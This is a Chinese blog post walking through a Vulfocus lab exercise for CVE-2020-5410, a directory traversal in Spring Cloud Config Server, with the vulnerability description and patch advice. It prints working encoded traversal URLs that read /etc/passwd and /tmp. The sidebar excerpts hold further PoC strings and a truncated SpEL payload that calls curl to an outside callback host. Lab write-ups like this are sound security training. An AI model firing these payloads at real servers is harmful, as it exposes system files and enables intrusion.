[Vulfocus解题系列] Spring 目录遍历 (CVE-2020-5410 )

最新推荐文章于 2024-04-26 14:13:28 发布
最新推荐文章于 2024-04-26 14:13:28 发布
阅读量2.4k 收藏 4
点赞数
分类专栏: 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45813980/article/details/118710865
版权

漏洞介绍

名称: Spring 目录遍历 (CVE-2020-5410 )

描述: Spring Cloud Config是美国威睿(VMware)公司的一套分布式系统的配置管理解决方案。该产品主要为分布式系统中的外部配置提供服务器和客户端支持。 Spring Cloud Config,2.2.3之前的2.2.x版本,2.1.9之前的2.1.x版本以及较旧的不受支持的版本允许应用程序通过spring-cloud-config-server模块提供任意配置文件。恶意用户或攻击者可以使用特制URL发送请求,这可能导致目录遍历攻击。

解题过程

1.打开靶场环境
在这里插入图片描述
2.访问指定路径并抓包,看到etc/passwd下的文件都被遍历出来了(抓不抓包都行,抓包看着更方便)

/…%252F…%252F…%252F…%252F…%252F…%252F…%252F…%252F…%252F…%252F…%252Fetc%252Fpasswd%23foo/development

在这里插入图片描述
3.换成查看tmp下的文件命令,读取到flag

http://118.193.36.37:36498/…%252F…%252F…%252F…%252F…%252F…%252F…%252F…%252F…%252F…%252F…%252Ftmp%23foo/development

在这里插入图片描述

修复建议:

升级到 Spring Cloud Config 至2.2.3版本或2.1.9版本,并且将Spring-Cloud-Config-Server服务放置在内网中,同时使用Spring Security进行身份验证。最新版本下载地址为:https://github.com/spring-cloud/spring-cloud-config/releases

00勇士王子
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Spring Cloud Config 目录穿越漏洞(CVE-2020-5410) 复现
Brucetg的博客
06-15 4961
Spring Cloud Config Spring Cloud Config 是 Spring Cloud 中用于分布式配置管理的组件,Spring Cloud Config 为分布式系统中的外部配置提供服务器和客户端支持。 影响版本 Spring Cloud Config: 2.2.0 to 2.2.2 Spring Cloud Config: 2.1.0 to 2.1.8 复现过程 https://github.com/spring-cloud/spring-cloud-config/releas
Spring Cloud Config 目录穿越漏洞(CVE-2020-5410)复现
thelostworld
02-20 1844
Spring Cloud Config 目录穿越漏洞 (CVE-2020-5410) ​ 一、漏洞简介 Spring Cloud Config,2.2.3之前的2.2.x版本,2.1.9之前的2.1.x版本以及较旧的不受支持的版本允许应用程序通过spring-cloud-config-server模块提供任意配置文件。恶意用户或攻击者可以使用特制URL发送请求,这可能导致目录遍历攻击。 二、影响版本 Spring Cloud Config: 2.2.0 to 2.2.2 Spring Cl..
Spring Cloud Config目录遍历漏洞(CVE-2019-3799)
最新发布
qq_50854662的博客
04-26 374
Spring Cloud Config目录遍历漏洞(CVE-2019-3799)
CVE-2020-5410: Spring Cloud Config Server 目录遍历漏洞通告
爱国小白帽
06-03 2353
CVE-2020-5410: Spring Cloud Config Server 目录遍历漏洞通告 360-CERT [三六零CERT](javascript:void(0)???? 昨天 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-HwKUmigU-1591180764214)(https://mmbiz.qpic.cn/mmbiz_jpg/Ic3Rgfdm96f3TFLd7feDIDR9fSLfwvia5uVr9YcNbGcyssibBJCUGb253Z0D64Xbf
【漏洞复现-spring-目录遍历vulfocus/spring-cve_2020_5410
10-15 1318
spring-目录遍历
Spring 目录遍历(CVE-2020-5410)
weixin_46801402的博客
11-02 486
Spring 目录遍历(CVE-2020-5410)
Vulfocus-Spring 目录遍历CVE-2020-5410
qq_41819939的博客
07-29 494
SpringCloudConfig是美国威睿(VMware)公司的一套分布式系统的配置管理解决方案。SpringCloudConfig,2.2.3之前的2.2.x版本,2.1.9之前的2.1.x版本以及较旧的不受支持的版本允许应用程序通过spring-cloud-config-server模块提供任意配置文件。恶意用户或攻击者可以使用特制URL发送请求,这可能导致目录遍历攻击。SpringCloudConfig,2.2.3之前的2.2.x版本,2.1.9之前的2.1.x版本。...
cve-2020-14750.zip9(补丁升级)
05-26
2020年11月2日,Oracle官方发布了此安全警报针对Oracle WebLogic Server中的远程代码执行漏洞CVE-2020-14750,此漏洞可以在没有身份验证的情况下进行远程攻击,也就是说,可以在不需要用户名和密码的情况下通过网络...
CVE-2020-13925 Apache Kylin 远程命令执行漏洞.md
04-12
CVE-2020-13925 Apache Kylin 远程命令执行漏洞
CVE-2020-35728:CVE-2020-35728 和 Jackson-databind RCE
05-31
描述 2.9.10.8 之前的 FasterXML jackson-databind 2.x 错误处理了与 ... web/javax.servlet.jsp.jstl)。 如何RCE pom.xml <?xml version="1.0" encoding="UTF-8"?>...
CVE-2020-36179:CVE-2020-36179~82 Jackson-databind SSRF&RCE
05-29
描述CVE-2020-36179:2.9.10.8之前的FasterXML jackson-databind 2.x处理与oadd.org.apache.commons.dbcp.cpdsadapter.DriverAdapterCPDS相关的序列化小工具和键入之间的交互。 CVE-2020-36180:FasterXML jackson-...
sharingIsCaring:TwonkyMedia服务器7.0.11-8.5目录遍历CVE-2018-7171
05-15
(和更多) CVE-2018-7171代表TwonkyMedia Server版本7.0.11-8.5(最新版本)中的目录/文件遍历漏洞。 利用此漏洞,攻击者可以列出独立运行TwonkyMedia Server平台的设备上的所有文件。 此外,攻击者可以利用此漏洞...
Spring 目录遍历CVE-2020-5410 )复现
YouthBelief的博客
11-03 956
Spring 目录遍历CVE-2020-5410Spring 目录遍历CVE-2020-5410 )0x01 漏洞描述0x02 影响范围0x03 漏洞复现0x04 漏洞修复 Spring 目录遍历CVE-2020-5410 ) 0x01 漏洞描述 Spring Cloud Config是美国威睿(VMware)公司的一套分布式系统的配置管理解决方案。该产品主要为分布式系统中的外部配置提供服务器和客户端支持。 Spring Cloud Config,2.2.3之前的2.2.x版本,2.1.9
[CVE-2020-5410]spring-cloud-config路径穿越导致的信息泄露
公众号shadow sock7
06-22 1458
用之前的环境即可: https://github.com/shadowsock5/spring-cloud-config-starter PoC参考: https://github.com/osamahamad/CVE-2020-5410-POC 127.0.0.1:8888/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23foo/development 影响范围 S
Spring框架中文件目录遍历漏洞 Directory traversal in Spring framework
BearFinn的博客
04-24 3022
Spring框架中文件目录遍历漏洞 Directory traversal in Spring framework 官方给出的描述是Spring框架中报告了一个与静态资源处理相关的目录遍历漏洞。某些URL在使用前未正确加密,使得攻击者能够获取文件系统上的任何文件,这些文件也可用于运行SpringWeb应用程序的进程。 受影响的版本: Spring Framework 3.0.4 to 3.2.11...
SpringCloud CVE_2019_3799--CVE_2020_5410 批量poc
weixin_45427650的博客
04-17 826
import requests import argparse import re CVE_2019_3799_win = r'/aaa/bbb/master/..%252F..%252F..%252F..%252F..%252F..%252Fwindows/win.ini' CVE_2019_3799_linux = r'/foo/default/master/..%252F..%252F..%252F..%252Fetc%252fpasswd' CVE_2020_5410_linux = r'/..
spring cloud config server目录遍历漏洞 CVE-2020-5410
weixin_47267061的博客
03-10 447
Spring Cloud Config 目录穿越漏洞(CVE-2020-5410)复现
[Vulfocus解题系列]spring 代码执行 (CVE-2018-1273)
00勇士王子的博客
01-05 3211
简介 Spring Expression Language是一个功能强大的表达式 语言支持查询和在运行时操作一个对象图。 攻击者可以在未获得授权的情况下,将精心制作的请求参数注入到存在该漏洞的服务器上,从而发起远程代码执行攻击。 复现过程 使用在线靶场 抓包 改包,将data数据改为下面的payload username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("curl http://m9c5f3.ceye.io/
mkdocs 1.2.2 内置开发服务器允许目录遍历cve-2021-40978
05-14
不幸的是,mkdocs的1.2.2版本存在一个漏洞(CVE-2021-40978),如果使用内置的开发服务器,攻击者可以利用目录遍历漏洞来读取服务器上任何文件。这个漏洞的根本原因在于mkdocs没有正确处理用户提供的HTTP请求参数,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值